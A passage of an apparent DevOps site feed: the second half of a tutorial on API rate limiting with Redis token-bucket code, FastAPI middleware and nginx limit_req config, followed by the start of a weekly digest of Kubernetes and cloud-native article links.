<span class="hljs-keyword">local</span> elapsed = <span class="hljs-built_in">math</span>.<span class="hljs-built_in">max</span>(<span class="hljs-number">0</span>, now - last)
tokens = <span class="hljs-built_in">math</span>.<span class="hljs-built_in">min</span>(capacity, tokens + elapsed * refill_rate)

<span class="hljs-keyword">local</span> allowed = <span class="hljs-number">0</span>
<span class="hljs-keyword">if</span> tokens &gt;= requested <span class="hljs-keyword">then</span>
  tokens = tokens - requested
  allowed = <span class="hljs-number">1</span>
<span class="hljs-keyword">end</span>

redis.call(<span class="hljs-string">&#x27;HMSET&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-string">&#x27;tokens&#x27;</span>, tokens, <span class="hljs-string">&#x27;last&#x27;</span>, now)
<span class="hljs-comment">-- expire idle buckets so Redis does not fill up with stale keys</span>
redis.call(<span class="hljs-string">&#x27;EXPIRE&#x27;</span>, KEYS[<span class="hljs-number">1</span>], <span class="hljs-built_in">math</span>.<span class="hljs-built_in">ceil</span>(capacity / refill_rate) * <span class="hljs-number">2</span>)

<span class="hljs-keyword">return</span> { allowed, tokens }
</code></pre><p>Load it once and call it per request:</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> time
<span class="hljs-keyword">import</span> redis

r = redis.Redis(host=<span class="hljs-string">&quot;localhost&quot;</span>, port=<span class="hljs-number">6379</span>, decode_responses=<span class="hljs-literal">True</span>)

<span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;token_bucket.lua&quot;</span>) <span class="hljs-keyword">as</span> f:
    take_token = r.register_script(f.read())

<span class="hljs-keyword">def</span> <span class="hljs-title function_">allow</span>(<span class="hljs-params">key, capacity=<span class="hljs-number">100</span>, refill_rate=<span class="hljs-number">10</span>, cost=<span class="hljs-number">1</span></span>):
    allowed, remaining = take_token(
        keys=[key],
        args=[capacity, refill_rate, time.time(), cost],
    )
    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bool</span>(allowed), <span class="hljs-built_in">int</span>(remaining)
</code></pre><h3 id="h3-leaky-bucket" class="group relative scroll-mt-24">
        <a href="#h3-leaky-bucket" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Leaky bucket
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-leaky-bucket"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A leaky bucket is a queue that drains at a constant rate. Requests pour in (possibly in bursts), sit in the queue, and leave at a fixed pace. If the queue is full, new requests are dropped.</p>
<pre><code class="hljs language-text">   bursty requests in
        | | |  |
        v v v  v
     +-----------+
     |  queue    |   drops when full
     +-----------+
           |
      constant drain (e.g. 10 req/sec)
           v
      to downstream
</code></pre><p>The difference from token bucket matters. Token bucket allows a burst to pass through immediately as long as it has tokens. Leaky bucket never lets the output exceed the drain rate, no matter what. Use leaky bucket when the thing behind your API can only handle a steady throughput, for example a legacy system or a third-party API with a hard ceiling. If you want to allow bursts, use token bucket instead.</p>
<h2 id="h2-which-one-should-you-use" class="group relative scroll-mt-24">
        <a href="#h2-which-one-should-you-use" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Which one should you use?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-which-one-should-you-use"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><table>
<thead>
<tr>
<th>Algorithm</th>
<th>Allows bursts</th>
<th>Memory per client</th>
<th>Accuracy</th>
<th>Use when</th>
</tr>
</thead>
<tbody><tr>
<td>Fixed window</td>
<td>At the boundary (bad)</td>
<td>1 integer</td>
<td>Low</td>
<td>Rough internal limits</td>
</tr>
<tr>
<td>Sliding window log</td>
<td>No</td>
<td>1 entry per request</td>
<td>Exact</td>
<td>Low-volume, precise rules</td>
</tr>
<tr>
<td>Sliding window counter</td>
<td>Smoothed</td>
<td>2 integers</td>
<td>High</td>
<td>General-purpose default</td>
</tr>
<tr>
<td>Token bucket</td>
<td>Yes, up to capacity</td>
<td>small hash</td>
<td>High</td>
<td>Public APIs, most cases</td>
</tr>
<tr>
<td>Leaky bucket</td>
<td>No</td>
<td>queue</td>
<td>High</td>
<td>Protecting a fixed-rate downstream</td>
</tr>
</tbody></table>
<p>If you are not sure, use <strong>token bucket</strong>. It handles real traffic well, the burst behavior is intuitive, and the Redis implementation above is production-ready. Reach for the sliding window counter if &quot;X requests per minute&quot; is easier to explain to your customers than a bucket.</p>
<h2 id="h2-wiring-it-into-your-api" class="group relative scroll-mt-24">
        <a href="#h2-wiring-it-into-your-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wiring it into your API
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-wiring-it-into-your-api"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the token bucket as FastAPI middleware. It keys off the client IP, but in production you should key off the API key or authenticated user ID so a shared NAT does not punish everyone behind it.</p>
<pre><code class="hljs language-python"><span class="hljs-keyword">from</span> fastapi <span class="hljs-keyword">import</span> FastAPI, Request
<span class="hljs-keyword">from</span> fastapi.responses <span class="hljs-keyword">import</span> JSONResponse

app = FastAPI()

<span class="hljs-meta">@app.middleware(<span class="hljs-params"><span class="hljs-string">&quot;http&quot;</span></span>)</span>
<span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">rate_limit</span>(<span class="hljs-params">request: Request, call_next</span>):
    client_key = request.headers.get(<span class="hljs-string">&quot;x-api-key&quot;</span>) <span class="hljs-keyword">or</span> request.client.host
    key = <span class="hljs-string">f&quot;rl:<span class="hljs-subst">{client_key}</span>&quot;</span>

    <span class="hljs-keyword">try</span>:
        allowed, remaining = allow(key, capacity=<span class="hljs-number">100</span>, refill_rate=<span class="hljs-number">10</span>)
    <span class="hljs-keyword">except</span> redis.RedisError:
        <span class="hljs-comment"># fail open: if Redis is down, let traffic through rather than</span>
        <span class="hljs-comment"># taking the whole API offline. See the note below.</span>
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">await</span> call_next(request)

    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> allowed:
        <span class="hljs-keyword">return</span> JSONResponse(
            status_code=<span class="hljs-number">429</span>,
            content={<span class="hljs-string">&quot;error&quot;</span>: <span class="hljs-string">&quot;rate limit exceeded&quot;</span>, <span class="hljs-string">&quot;retry_after&quot;</span>: <span class="hljs-number">1</span>},
            headers={
                <span class="hljs-string">&quot;Retry-After&quot;</span>: <span class="hljs-string">&quot;1&quot;</span>,
                <span class="hljs-string">&quot;X-RateLimit-Limit&quot;</span>: <span class="hljs-string">&quot;100&quot;</span>,
                <span class="hljs-string">&quot;X-RateLimit-Remaining&quot;</span>: <span class="hljs-string">&quot;0&quot;</span>,
            },
        )

    response = <span class="hljs-keyword">await</span> call_next(request)
    response.headers[<span class="hljs-string">&quot;X-RateLimit-Limit&quot;</span>] = <span class="hljs-string">&quot;100&quot;</span>
    response.headers[<span class="hljs-string">&quot;X-RateLimit-Remaining&quot;</span>] = <span class="hljs-built_in">str</span>(remaining)
    <span class="hljs-keyword">return</span> response
</code></pre><p>Send back the standard headers. Clients use <code>X-RateLimit-Remaining</code> to slow themselves down before they hit the wall, and <code>Retry-After</code> tells a well-behaved client exactly how long to wait. Skipping these turns every client into a blind retry machine, which is the opposite of what you want.</p>
<h3 id="h3-fail-open-or-fail-closed" class="group relative scroll-mt-24">
        <a href="#h3-fail-open-or-fail-closed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fail open or fail closed?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fail-open-or-fail-closed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When Redis is unreachable, you have two choices and you must pick deliberately:</p>
<ul>
<li><strong>Fail open</strong> (allow the request): the right default for general traffic. A Redis blip should not take your whole API down. The example above does this.</li>
<li><strong>Fail closed</strong> (reject the request): the right call for login, password reset, and payment endpoints, where letting traffic through unmetered is worse than a brief outage.</li>
</ul>
<p>Do not leave this to chance. An unhandled Redis exception that bubbles up as a 500 is the worst of both worlds.</p>
<h2 id="h2-do-it-at-the-edge-when-you-can" class="group relative scroll-mt-24">
        <a href="#h2-do-it-at-the-edge-when-you-can" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Do it at the edge when you can
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-do-it-at-the-edge-when-you-can"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If all you need is a flat limit per IP, do not write code at all. Put it in nginx in front of your service:</p>
<pre><code class="hljs language-nginx"><span class="hljs-comment"># define a shared memory zone keyed by client IP, 10 req/sec</span>
<span class="hljs-attribute">limit_req_zone</span> <span class="hljs-variable">$binary_remote_addr</span> zone=api:<span class="hljs-number">10m</span> rate=10r/s;

<span class="hljs-section">server</span> {
    <span class="hljs-section">location</span> /api/ {
        <span class="hljs-comment"># allow short bursts of 20, no artificial delay on them</span>
        <span class="hljs-attribute">limit_req</span> zone=api burst=<span class="hljs-number">20</span> nodelay;
        <span class="hljs-attribute">limit_req_status</span> <span class="hljs-number">429</span>;
        <span class="hljs-attribute">proxy_pass</span> http://backend;
    }
}
</code></pre><p>nginx&#39;s <code>limit_req</code> is a leaky bucket under the hood. This stops abusive traffic before it ever reaches your application, which is exactly where you want to drop it. Use the application-level Redis approach when you need per-user limits, different tiers, or limits that depend on the request body. Use both together for defense in depth.</p>
<h2 id="h2-seeing-it-work" class="group relative scroll-mt-24">
        <a href="#h2-seeing-it-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Seeing it work
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-seeing-it-work"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Fire a quick loop at the endpoint and watch the limit kick in:</p>
<pre><code class="hljs language-text">$ for i in $(seq 1 12); do \
    curl -s -o /dev/null -w &quot;%{http_code} &quot; http://localhost:8000/api/data; \
  done
200 200 200 200 200 200 200 200 200 200 429 429
</code></pre><p>The full response on a rejected request:</p>
<pre><code class="hljs language-text">$ curl -i http://localhost:8000/api/data
HTTP/1.1 429 Too Many Requests
content-type: application/json
retry-after: 1
x-ratelimit-limit: 100
x-ratelimit-remaining: 0

{&quot;error&quot;:&quot;rate limit exceeded&quot;,&quot;retry_after&quot;:1}
</code></pre><p>And the bucket state itself, straight from Redis:</p>
<pre><code class="hljs language-text">$ redis-cli HGETALL rl:203.0.113.45
1) &quot;tokens&quot;
2) &quot;0&quot;
3) &quot;last&quot;
4) &quot;1717840800.123&quot;
</code></pre><p>Tokens at zero, last access timestamped. Wait a second and the Lua script refills 10 tokens on the next request.</p>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-next-steps"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Add the token bucket Lua script and FastAPI middleware to one endpoint, key it off the API key, and load test it with <code>hey -z 30s -c 50 http://localhost:8000/api/data</code> to confirm the 429s show up where you expect.</li>
<li>Set your <code>capacity</code> and <code>refill_rate</code> from real traffic, not guesses. Pull your p99 requests-per-second per client from logs and set the sustained rate a bit above that, with capacity for a 5 to 10 second burst.</li>
<li>Pick fail-open or fail-closed per endpoint group and write it into the code, not a wiki page.</li>
<li>Add <code>X-RateLimit-*</code> headers to every response and document them so client teams can back off gracefully.</li>
<li>Put a flat per-IP <code>limit_req</code> in nginx as a cheap outer wall, even if you already limit per user in the app.</li>
<li>Alert on your 429 rate. A sudden spike means either an abusive client or a limit set too low for legitimate traffic, and you want to know which before the support tickets arrive.</li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 24, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-24</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 08 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-24</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-benchmarking-kubevirt-performance-with-virtbench" class="group relative scroll-mt-24">
        <a href="#h3-benchmarking-kubevirt-performance-with-virtbench" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Benchmarking KubeVirt performance with virtbench
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-benchmarking-kubevirt-performance-with-virtbench"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Organizations migrating VM estates from traditional hypervisors to KubeVirt often discover that many Kubernetes observability tools were originally designed around container workloads rather than VM-c</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/08/benchmarking-kubevirt-performance-with-virtbench/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-the-future-how-garanti-bbva-manages-etcd-in-massive-red-hat-openshift-environments" class="group relative scroll-mt-24">
        <a href="#h3-scaling-the-future-how-garanti-bbva-manages-etcd-in-massive-red-hat-openshift-environments" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling the future: How Garanti BBVA manages etcd in massive Red Hat OpenShift environments
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-the-future-how-garanti-bbva-manages-etcd-in-massive-red-hat-openshift-environments"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>At the OpenShift Commons Gathering in Amsterdam on March 23—a Day Zero event for KubeCon + CloudNativeCon Europe 2026—attendees got a deep look into the engine room of 1 of Turkey&#39;s largest private ba</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-future-how-garanti-bbva-manages-etcd-massive-red-hat-openshift-environments"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-path-to-autonomous-intelligent-networks" class="group relative scroll-mt-24">
        <a href="#h3-the-path-to-autonomous-intelligent-networks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The path to autonomous intelligent networks
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-path-to-autonomous-intelligent-networks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Telecommunications (telco) service providers face a landscape of massive operational complexity. As they adopt 5G standalone architectures and multivendor radio access networks (RANs), they must manag</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/path-autonomous-intelligent-networks"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-an-eks-environment-factory-with-pulumi-and-vcluster" class="group relative scroll-mt-24">
        <a href="#h3-build-an-eks-environment-factory-with-pulumi-and-vcluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build an EKS Environment Factory with Pulumi and vCluster
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-an-eks-environment-factory-with-pulumi-and-vcluster"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS reports in an AWS Architecture Blog case study that Deloitte’s move to a virtual cluster model on Amazon EKS resulted in 89% faster testing environment provisioning. By consolidating dozens of dis</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/eks-vcluster-ephemeral-environments-with-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster" class="group relative scroll-mt-24">
        <a href="#h3-field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Field Notes: Using the Harvester CSI Driver to consume Longhorn storage in your guest cluster
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When running a guest Kubernetes cluster inside SUSE Virtualization/Harvester, you get the best of both worlds: bare-metal performance with VM-level flexibility. It’s a really common pattern: you insta</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/field-notes-using-the-harvester-csi-driver-to-consume-longhorn-storage-in-your-guest-cluster/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openshift-virtualization-421-removing-complexity-from-your-virtual-machine-networking-workflow" class="group relative scroll-mt-24">
        <a href="#h3-openshift-virtualization-421-removing-complexity-from-your-virtual-machine-networking-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenShift Virtualization 4.21: Removing complexity from your virtual machine networking workflow
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-openshift-virtualization-421-removing-complexity-from-your-virtual-machine-networking-workflow"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Red Hat OpenShift Virtualization 4.21 introduces highly anticipated networking design flows to simplify network management. Tailored to VM network requirements, this complete workflow lets you more ef</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/openshift-virtualization-421-removing-complexity-your-virtual-machine-networking-workflow"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-kubernetes-dashboard-to-headlamp-understanding-the-transition" class="group relative scroll-mt-24">
        <a href="#h3-from-kubernetes-dashboard-to-headlamp-understanding-the-transition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Kubernetes Dashboard to Headlamp: Understanding the Transition
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-kubernetes-dashboard-to-headlamp-understanding-the-transition"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For many people, Kubernetes Dashboard was their first window into Kubernetes. It offered a simple visual way to see what was running in a cluster, inspect resources, and build confidence without relyi</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/06/01/dashboard-to-headlamp/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms" class="group relative scroll-mt-24">
        <a href="#h3-breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Breaking free of a single datacenter: Practical geo-distributed AI operations with the k0smos platforms
        </a>
        <button 
